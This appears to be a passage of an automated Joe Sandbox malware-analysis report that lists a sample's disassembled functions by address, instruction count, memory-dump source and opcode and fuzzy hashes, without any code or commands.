                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction ID: 4340d3c50f8eb2f8784928a459d3dc269bd8b8622da78412714291cfd80c9511
                                                            • Opcode Fuzzy Hash: 2333e3777f33246457bb85df05e5fc866280f57083fbca3d07e82f28b49f10b8
                                                            • Instruction Fuzzy Hash: 66A12632E0022D9FDB21DB99C844BFEBBB5AF01720F150125EA51AB2E0D7789D44EBD1
                                                            Function 00FD0185 Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction ID: 3359cf7f3a1b4d92ddf88c5d34f5d3c0dbbd8e05a97995c88d31c29cc8c1435b
                                                            • Opcode Fuzzy Hash: b2722e0785ba113edcb44a1a6e84a71913ba6323ced81f459644bcc63c64d863
                                                            • Instruction Fuzzy Hash: C6A1E871B016169BDB25CF65C991BAA77F2FF44314F18402AEA85D7382DF34E811EB50
                                                            Function 01064500 Relevance: .3, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction ID: 56d10725c4a24724ed7565a383b36bfb42bd3f0e11e02e547bf3c9af0d0f5a48
                                                            • Opcode Fuzzy Hash: a91d5e64bb13997e3a6b375a9a953153e88ae098e68e05d5d398d729ec19aa77
                                                            • Instruction Fuzzy Hash: E7A1C9B2A04651AFC762DF18CD80B6ABBE9FF49704F050568F589DB652C738E900CB91
                                                            Function 010160E0 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction ID: c9f4ee95a0ae38f4e788c1b6b84d568ca668f4f0c2b189ce80f548a3f5b39af4
                                                            • Opcode Fuzzy Hash: 6fa4fdce2c5d2d1ea8073865ceaa99c0532bd83ec02a6e835c68183c1013e246
                                                            • Instruction Fuzzy Hash: 8C91B171D00215AFDB15CFA8DC90BBEBBB5AF48710F144169E690EB345D7BAE9009BA0
                                                            Function 00FAE3F0 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction ID: cf8b6a1f4139449e458d9017f5eab46f17d425dea1438c15b727973ef3f69271
                                                            • Opcode Fuzzy Hash: 79bd2cd51e45fe38b4fc3798880614fef4d039dc58d561132fa8c68593f82720
                                                            • Instruction Fuzzy Hash: 8A9186B6E002158FDB24EB58C840B7EB7A5EF8A724F198069ED40DB390E778DC01EB50
                                                            Function 00FC4750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                            • Instruction ID: 0637dcb801a493edc9e6d74b0c303aabcadf55fd693624e4c4565304be258f45
                                                            • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                            • Instruction Fuzzy Hash: F2814032A042978FEB134E5CC9E27ADBB61FF56310F28467ED5829F2C1C264A845E791
                                                            Function 0105F7B0 Relevance: .2, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1adcccaa10963fb296e7640d3fbfea13054ba7b072e36b085e0c55e0d6005ce0
                                                            • Instruction ID: 9b0391864f8874de47e5eb21d49540bc9e65411db3a93cbe152864f9a8892e16
                                                            • Opcode Fuzzy Hash: 1adcccaa10963fb296e7640d3fbfea13054ba7b072e36b085e0c55e0d6005ce0
                                                            • Instruction Fuzzy Hash: 6491C371A00617ABEB95CF28C8407BBBBE5EF44310F1485A8ED95DB282D779E901CB90
                                                            Function 0105F43F Relevance: .2, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 613e7828539de4f48b08fdd9a04e04586a6b6ac3d3cd62c870218fbc3035646e
                                                            • Instruction ID: 9ff472ef152ed1d7912d92ddc0973b5fa34fc4aedf4057f872ef1efe59da28a8
                                                            • Opcode Fuzzy Hash: 613e7828539de4f48b08fdd9a04e04586a6b6ac3d3cd62c870218fbc3035646e
                                                            • Instruction Fuzzy Hash: B491D572A001168BDF58CF79C8906BEBBF1EF88311B1986A9D895DB396D738D901CB50
                                                            Function 010581CC Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bae143f0784a991b8a28805ce2dd8d2cbaec77d70ddec0d1f80b4bb08cd6330f
                                                            • Instruction ID: 40ebc708a7ce58cbbe764f1fc34267d44f330784cdd6e4e93a2ea029f73e4817
                                                            • Opcode Fuzzy Hash: bae143f0784a991b8a28805ce2dd8d2cbaec77d70ddec0d1f80b4bb08cd6330f
                                                            • Instruction Fuzzy Hash: 3B81A371E005159BCB94CFAEC8845BEBBF1FB88210B18C26BDDA1E7291D7749952CB90
                                                            Function 00FA0E59 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 079df843333d4dd3b43934a0c7c7c44173705c1a4d5ad12ad1e19bb30ca66fd0
                                                            • Instruction ID: 4826fb71106b36892689413e2fc68310186ff0cf3cdafa86a1e2dfcf2199f64b
                                                            • Opcode Fuzzy Hash: 079df843333d4dd3b43934a0c7c7c44173705c1a4d5ad12ad1e19bb30ca66fd0
                                                            • Instruction Fuzzy Hash: 5E81A771E005199FCB24CF59D8809BE7BB2FFD6350B29C295E854AB349DA30ED41EB90
                                                            Function 00FE6ACC Relevance: .2, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction ID: 187bd919769e82157f070637b50dc6be1eb2b5bfcbbd06d6f0b96244086831ae
                                                            • Opcode Fuzzy Hash: 0c4ca9d4a355a3b3effe141ab6876c4bcabfe4ed62c185f5df61957366af0776
                                                            • Instruction Fuzzy Hash: 1681E4B1E002599FDB24CF6AC840ABEBBF9FB58750F14852EE455E7240E734E940DB94
                                                            Function 0104E4F6 Relevance: .2, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5199b151b7487e898898529701a4574acdcef73d9a681acd2d98af98946b7010
                                                            • Instruction ID: 4fa722e8e94f6abcbce2bd3ab4c0f214008ba76e8797383fc874d2187b6625d0
                                                            • Opcode Fuzzy Hash: 5199b151b7487e898898529701a4574acdcef73d9a681acd2d98af98946b7010
                                                            • Instruction Fuzzy Hash: F78191B2E002159BDB18CF98C9906ADBBF1FF89310F1981A9D956EB385D734AD41CB90
                                                            Function 0105AB40 Relevance: .2, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 1fc952c5ad8faadf0a710fe5fcbb69404a41cd4ce29be367baec4d23c2ab2c38
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: F7815E71B00209DFDF99DF99C880AAFBBF6BF84310B1486A9DD569B345D634E901CB50
                                                            Function 00F120C9 Relevance: .2, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 769e668d84c0c08b37ef7ef7aa7e9a570b307ecb42ec6a78fdf240e39ebed224
                                                            • Instruction ID: 7a02b7dc776595c0ce23fdbeb7fbc967cd21278138af4965ceb87747217677af
                                                            • Opcode Fuzzy Hash: 769e668d84c0c08b37ef7ef7aa7e9a570b307ecb42ec6a78fdf240e39ebed224
                                                            • Instruction Fuzzy Hash: 5571BB365093929EE706CB7889537C9FF69FE56314B3812DEC4904F0A3D7269063E785
                                                            Function 00FCE284 Relevance: .2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction ID: 7b90ba15822a89e7bf7db801497f17d4586ed6b6ec095edfb9d3ca385532c011
                                                            • Opcode Fuzzy Hash: 424a000b0a8b8a7d7d3e38bb7243e3ede749c09c205a2e529710747393d4be7e
                                                            • Instruction Fuzzy Hash: C1816C71A0060AAFDB25CBA8C981FEEBBFAFF48314F10442DE555A7250D730AD05DB60
                                                            Function 00FBB950 Relevance: .2, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 583205f0032a6377e74722a8b6cd7981ed6799fea82b9479a9c9edacf61b0348
                                                            • Instruction ID: 2f951f77e2c7fb928f378f72c0f7246c4233e21f2e7d9bdfd63d7f41094addd8
                                                            • Opcode Fuzzy Hash: 583205f0032a6377e74722a8b6cd7981ed6799fea82b9479a9c9edacf61b0348
                                                            • Instruction Fuzzy Hash: D0712631A142548EE724CE2BC8807B673E5AF95714F648159ED92CB1E4D7BAEC02FF60
                                                            Function 00FAC640 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction ID: 3c5e5598c73f772867d6fac2c0d6d4948e1852bddfacf91de6d04734cbe6191d
                                                            • Opcode Fuzzy Hash: c40951eb91ed891f3820643cae86730e813e259ba64995b5f22afef92a8e037e
                                                            • Instruction Fuzzy Hash: B471E1B5C04669DBCB25CF58C8907BEBBB4FF59750F24411AE982AB3A0D7359801EBD0
                                                            Function 010447A0 Relevance: .2, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction ID: 5b94d2c662ccfadd44cdcf751719577e24e6e157e064877ee251c99ce039f3e0
                                                            • Opcode Fuzzy Hash: 33ae0a5f2f838a7418ae21636f93bc71f4d0f0c2c9d6f33f5051ed4499d435f3
                                                            • Instruction Fuzzy Hash: 187180B0D04204EFDB20EF59D981B9EBBF9FB81310F0641AAE6C0EB259C7368944DB54
                                                            Function 00FA260B Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction ID: 4ba3f59ffa89abdc4140a9282e154257f6772a4c6e92dc1bf7400764aa46fec9
                                                            • Opcode Fuzzy Hash: fac8acfa9b0e4c632673ce1519df7489283869de82962ef068165e70931141ef
                                                            • Instruction Fuzzy Hash: 8B718AB6B046428FC351DF28C480B6AB7E5FF85320F0485AAE8998B352DB38DD45DB91
                                                            Function 010570E9 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1420f327c40ff5ef590f316669073584cdd48efa3a6f5bc96b0c6a84877a8e91
                                                            • Instruction ID: 7042028b27988226f12d7f96e65524cfda0e562f314f1aeaa185899698a6be57
                                                            • Opcode Fuzzy Hash: 1420f327c40ff5ef590f316669073584cdd48efa3a6f5bc96b0c6a84877a8e91
                                                            • Instruction Fuzzy Hash: E761F771E002169BDF91EEADC8859BFB7BABF44300F804069ED9197241EB74D941EB90
                                                            Function 0104F0CC Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4eb5207722a756d4def479fdbc22b2d0bea89f6394784c8e0dfaedcb1f65f300
                                                            • Instruction ID: 744e8a3b649c25a4fbf0f9d0daed486841e08c99b08106c8890748d152aa1360
                                                            • Opcode Fuzzy Hash: 4eb5207722a756d4def479fdbc22b2d0bea89f6394784c8e0dfaedcb1f65f300
                                                            • Instruction Fuzzy Hash: 4F7188B8A01623DBDB64CF5EC1C057EB7F1BB85604B6544BED9C29B250E374E980CBA0
                                                            Function 0101035C Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 0fbcf978a278ea250190681ec8da620bde35533a56dae8b8d2ba82ce26ccd70b
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: FB717D71A00619EFCB10DFA9C984ADEBBF9FF48700F104569F585A7255EB38EA41CB90
                                                            Function 010262A0 Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction ID: ed7c7a63fea8941459400d4a0a3698e3f631021d40ecc94e31b537c563d41204
                                                            • Opcode Fuzzy Hash: 77a6e640571c0e555c27001f4541ad38cbd92c3b844289546b96023df87492f6
                                                            • Instruction Fuzzy Hash: 4E710232200B11AFE7329F18CC45F5ABBE6FF44720F148459EAD68B2A1DB76E944DB50
                                                            Function 00F98AA0 Relevance: .2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction ID: a081d8bc009898e11d4a2cb2be72231c4146901dd642bb46d2b9cf78b71870c7
                                                            • Opcode Fuzzy Hash: 21c0d44e2fa1f11fbfaf2dfd43c0c1c3f677b57c6d652373a4931dc1b29bff94
                                                            • Instruction Fuzzy Hash: 4581A472E0831A8FEB24CF98D484B6D77B1BF89320F15412DD900AB392C7799D41EB90
                                                            Function 0105132D Relevance: .2, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaa2b5ab7b7785bfc9cc7190e342b1f24c904341dd800984c862aca21f082e32
                                                            • Instruction ID: 2ed6dc1d8dd8d0caeb014630e3c936a08a55755a8a49368b18a929e2cbefd0bb
                                                            • Opcode Fuzzy Hash: aaa2b5ab7b7785bfc9cc7190e342b1f24c904341dd800984c862aca21f082e32
                                                            • Instruction Fuzzy Hash: FA817F75A00205DFCB49CFA8C490AAEBBF1FF88300F1581A9D859EB355D734EA51CB90
                                                            Function 0104A250 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction ID: a51ee3f3939a685fb2056cdcfb5898927cd665b680975d153a12e0bfcc7cb3cc
                                                            • Opcode Fuzzy Hash: ceb04424a47bc893918233de4d821cb0f2b15337986059cf2ce2b3fdcc230be1
                                                            • Instruction Fuzzy Hash: 5F51CEB2644612EFD311DA68C884F5FB7E8EBC9750F004979BA82DB250DB75ED04C7A2
                                                            Function 0105CE93 Relevance: .2, Instructions: 172COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                            • Instruction ID: 642dc92f0857a3a221ee0891580b6d5b6250da249aeb072a8489c94e69dd3871
                                                            • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                            • Instruction Fuzzy Hash: 975126326047028BEBD5DE2CC95076BBBDAAFD1350F0984ADEDD6C7242EA34D805C7A1
                                                            Function 00F20313 Relevance: .2, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                            • Instruction ID: 1a9dc6c4e84df0a53de29d8d4689b7acf2e41a3cd66291c462a89742191df519
                                                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                            • Instruction Fuzzy Hash: D15170B3E14A214BD318CE09DC40631B792FFD8312B5F81BADD199B357CE74E9529A90
                                                            Function 01038350 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1489c5be42816b2ada5294ced157353d0b3ef93a7b41bab687bfcfa0e306f47
                                                            • Instruction ID: c8eccb9e0dcadca9225ee5224d56620f3ef2a842c2170e89712d29e07e5039a8
                                                            • Opcode Fuzzy Hash: b1489c5be42816b2ada5294ced157353d0b3ef93a7b41bab687bfcfa0e306f47
                                                            • Instruction Fuzzy Hash: 1651A070900705AFD721DF5AC880A9BFBFCBF94710F10875EE19657AA1CBB0A545CB90
                                                            Function 00FCE443 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3eb6572cbfb6a7ab1d22168934310cee214144013281de830a27dcdea5736462
                                                            • Instruction ID: 06274ec16265731f2d4af30e7df43b433dc316f58f465b2b651dd179b8db409a
                                                            • Opcode Fuzzy Hash: 3eb6572cbfb6a7ab1d22168934310cee214144013281de830a27dcdea5736462
                                                            • Instruction Fuzzy Hash: AA515A71600A05AFDB22EF64CE81FAAB3F9FB04754F54046AF58597262D738AA40EB50
                                                            Function 01034180 Relevance: .2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45e1804484e693d0686d231ce6e7863ab57972d7f54b43c2917972afa8b9f64f
                                                            • Instruction ID: dc81ddd181df16f06a502f7defcd19fc51a75ea1c0244fd71764b1eda42a5e87
                                                            • Opcode Fuzzy Hash: 45e1804484e693d0686d231ce6e7863ab57972d7f54b43c2917972afa8b9f64f
                                                            • Instruction Fuzzy Hash: 6F5146716083029FD754DF29C881A6BBBE9BFC8704F44892EF589CB250EB34D9058B56
                                                            Function 00FB45B1 Relevance: .2, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction ID: 12cd575e4d2278cd757881e63aa6fea95d7bca7e3421eb8cf450918bca3ab537
                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                            • Instruction Fuzzy Hash: A051B071E00219ABCF15DF95C941BFEBBB5AF49750F144069E900AB251EB38EE44DFA0
                                                            Function 0100D800 Relevance: .2, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
